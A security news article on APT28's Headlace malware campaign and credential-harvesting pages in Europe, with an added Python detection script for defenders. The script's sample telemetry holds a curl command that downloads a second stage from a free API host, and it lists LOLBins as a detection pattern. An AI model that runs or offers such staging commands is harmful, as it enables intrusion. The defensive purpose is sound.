APT28 aims at essential networks in Europe with HeadLace malware

Russia-linked APT28 used the HeadLace malware and credential-harvesting web pages in attacks on networks across Europe.
Security analysts at Recorded Future's Insikt Group report that APT28 targeted networks across Europe with the information-stealing Headlace malware and with credential-harvesting web pages. The group deployed Headlace in three distinct phases between April and December 2023, using phishing, compromised online services, and living-off-the-land binaries. The credential-harvesting pages were built to target the Ministry of Defence of Ukraine, European transportation systems, and a think tank in Azerbaijan. Insikt Group found that these pages could defeat two-factor authentication and CAPTCHA challenges by relaying requests between the legitimate services and compromised Ubiquiti routers, an adversary-in-the-middle arrangement in which the victim completes a real login while the attacker captures what is submitted.
In some cases the threat actors hosted custom web pages on Mocky, a free mock-API service, that interacted with a Python script running on the compromised Ubiquiti routers to exfiltrate the submitted credentials.
Compromising networks tied to the Ministry of Defence of Ukraine and to European railway systems could give the attackers intelligence with which to shape battlefield tactics and broader military strategy. The group's focus on the Azerbaijan Center for Economic and Social Development also suggests an interest in understanding, and possibly influencing, regional policy.
Insikt Group assesses that the operation is designed to influence regional and military dynamics.
The APT28 group (also known as Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide. The group was also implicated in the series of attacks surrounding the 2016 US presidential election.
The group operates within military unit 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).
The attack chain in the incidents described by Insikt Group passes through seven distinct infrastructure stages designed to filter out sandbox environments, non-targeted operating systems, and non-targeted countries. Visitors who failed these checks received a benign file and were redirected to Microsoft's MSN portal (msn.com); those who passed them downloaded a malicious Windows BAT script that connected to a free API service to retrieve and execute successive shell commands.
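As an added detection example (not code from the report, from Insikt Group, or from the actor), the following Python sketch shows how a defender might hunt for the tail of that chain in endpoint telemetry: a .bat file launched from a user-writable download location whose descendant process either contacts a free API host or is a living-off-the-land binary that reaches the network. The events are constructed Sysmon-style records, the download-path and LOLBin lists are this example's own policy choices, and the hostname run.mocky.io is assumed from Mocky's public domain; none of these are indicators taken from the report.

```python
"""Hunt for a Headlace-style chain: user-downloaded BAT script -> child process
that fetches commands from a free API service. Added example; all indicators
below are assumptions for illustration, not IOCs from the Insikt Group report."""
import re
from collections import defaultdict

# Lure drop locations (assumed policy: user-writable profile directories).
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData|Desktop)\\", re.IGNORECASE)
# The chain on the page starts with a Windows batch script.
SCRIPT_EXT = re.compile(r"\.(bat|cmd)\b", re.IGNORECASE)
# Well-known living-off-the-land binaries able to fetch or run remote content.
LOLBINS = {"curl.exe", "certutil.exe", "powershell.exe", "bitsadmin.exe",
           "mshta.exe", "wscript.exe", "cscript.exe"}
# Free mock-API hosts usable as a command channel. Mocky is named on the page;
# run.mocky.io is the service's public domain and an assumption of this example.
FREE_API_HOSTS = {"run.mocky.io"}

# Constructed sample telemetry (not real events). Fields mimic Sysmon process
# creation (pid, ppid, image, cmdline) and network connection (pid, dest_host).
PROCESS_EVENTS = [
    {"pid": 1200, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 4312, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\ana\Downloads\invitation.bat"'},
    {"pid": 4400, "ppid": 4312, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -s https://run.mocky.io/v3/example -o %TEMP%\stage2"},
    {"pid": 5100, "ppid": 1200, "image": r"C:\Program Files\Microsoft\Edge\msedge.exe",
     "cmdline": "msedge.exe https://www.msn.com/"},
    # Benign: vendor updater batch file from a non-user-writable path.
    {"pid": 6000, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Program Files\Vendor\update.bat"'},
    {"pid": 6010, "ppid": 6000, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -s https://updates.vendor.example/manifest"},
]
NETWORK_EVENTS = [
    {"pid": 4400, "dest_host": "run.mocky.io", "dest_port": 443},
    {"pid": 5100, "dest_host": "www.msn.com", "dest_port": 443},
    {"pid": 6010, "dest_host": "updates.vendor.example", "dest_port": 443},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def descendants(root_pid, procs, max_depth=4):
    """Return root_pid plus every process under it, up to max_depth hops."""
    children = defaultdict(list)
    for p in procs:
        children[p["ppid"]].append(p["pid"])
    seen, frontier = set(), [(root_pid, 0)]
    while frontier:
        pid, depth = frontier.pop()
        if pid in seen or depth > max_depth:
            continue
        seen.add(pid)
        frontier.extend((c, depth + 1) for c in children[pid])
    return seen


def detect_headlace_chain(procs, net):
    """Flag a .bat launched from a user-writable path whose process tree
    contacts a free API host, or runs a LOLBin that reaches the network."""
    by_pid = {p["pid"]: p for p in procs}
    hosts_by_pid = defaultdict(list)
    for n in net:
        hosts_by_pid[n["pid"]].append(n["dest_host"])
    alerts = []
    for p in procs:
        cmd = p["cmdline"]
        if not (SCRIPT_EXT.search(cmd) and USER_WRITABLE.search(cmd)):
            continue  # not a script run from a lure drop location
        for pid in descendants(p["pid"], procs):
            child = by_pid.get(pid)
            if child is None:
                continue
            hosts = hosts_by_pid.get(pid, [])
            api_hits = [h for h in hosts if h.lower() in FREE_API_HOSTS]
            lolbin_with_net = basename(child["image"]) in LOLBINS and bool(hosts)
            if api_hits or lolbin_with_net:
                alerts.append({"root_pid": p["pid"], "script": cmd,
                               "child_pid": pid, "child": basename(child["image"]),
                               "hosts": hosts})
    return alerts


if __name__ == "__main__":
    for a in detect_headlace_chain(PROCESS_EVENTS, NETWORK_EVENTS):
        print(f"ALERT pid={a['root_pid']} {a['script']} -> {a['child']} {a['hosts']}")
```

The rule is deliberately a hunting signal rather than a block: a legitimate batch file run from Downloads that calls PowerShell against an internal host will also trip the LOLBin branch, so in practice the free-API-host branch should be escalated first and the LOLBin branch triaged against an allowlist of expected destinations.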

In December 2023, researchers from Proofpoint and IBM disclosed a new series of APT28 spear-phishing attacks that used multiple lures to distribute the Headlace malware. Those campaigns targeted at least thirteen different countries.
“By analyzing Headlace geofencing scripts and the countries targeted by the credential-harvesting campaigns from 2022 onwards, Insikt Group identified that thirteen distinct countries had been targeted by BlueDelta. As anticipated, Ukraine ranked first with 40% of the activity,” reads the report published by the Insikt Group. “Turkey might appear as an unexpected target with 10%, but it’s crucial to note that it was specifically singled out only by Headlace geofencing, unlike Ukraine, Poland, and Azerbaijan, which were targeted through both Headlace geofencing and credential harvesting.”
Analysts urge government, military, defense, and related organizations to strengthen their defenses by focusing on detecting advanced phishing attempts, restricting access to non-essential online services such as free API and mock-response platforms, and tightening monitoring of critical network infrastructure, including edge devices such as routers.
(SecurityAffairs – hacking, Russia)
